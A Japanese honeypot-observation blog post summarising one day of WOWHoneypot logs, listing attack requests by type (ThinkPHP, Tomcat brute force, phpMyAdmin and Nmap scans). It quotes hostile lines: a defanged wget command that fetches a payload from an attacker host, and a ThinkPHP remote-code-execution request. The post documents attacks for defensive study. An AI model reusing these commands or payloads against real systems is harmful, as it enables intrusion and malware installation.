23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(66日目)

2019/05/21(火)

トータルは294件です。

ハンティングログは以下です。

173.9.207.50 wget+hxxp://hulo.r00ts.online/.configs/Ex01
189.145.18.101 wget+hxxp://hulo.r00ts.online/.configs/Ex01
202.147.186.62 wget+hxxp://hulo.r00ts.online/.configs/Ex01

www.virustotal.com



件数 概要 リクエス
172 調査 HEAD /
57 アクセス GET /
35 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
3 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Zabbixの調査 POST /zabbix/index.php
1 Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 POST /users?page=&size=5
1 Nmapによる調査 POST /sdk
1 不正中継の調査 GET hxxp://110.249.212.46/testget?q=23333&port=80
1 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 stalker_portalの調査 GET /stalker_portal/server/adm/users/users-list-json
1 stalker_portalの調査 GET /stalker_portal/server/adm/tv-channels/iptv-list-json
1 ZmEuによるphpMyAdminの調査 GET /scripts/setup.php/index.php
1 ZmEuによるphpMyAdminの調査 GET /pma/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/setup.php/index.php
1 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpmy/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/setup.php/index.php
1 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/setup.php
1 ZmEuによるphpMyAdminの調査 GET /pHpMyAdMiN/scripts/setup.php
1 Nmapによる調査 GET /nmaplowercheck1558447161
1 Nmapによる調査 GET /evox/about
1 ZmEuによるphpMyAdminの調査 GET /PHPMYADMIN/scripts/setup.ph
1 Nmapによる調査 GET /NmapUpperCheck1558447161
1 Nmapによる調査 GET /Nmap/folder/check1558447161
1 Nmapによる調査 GET /HNAP1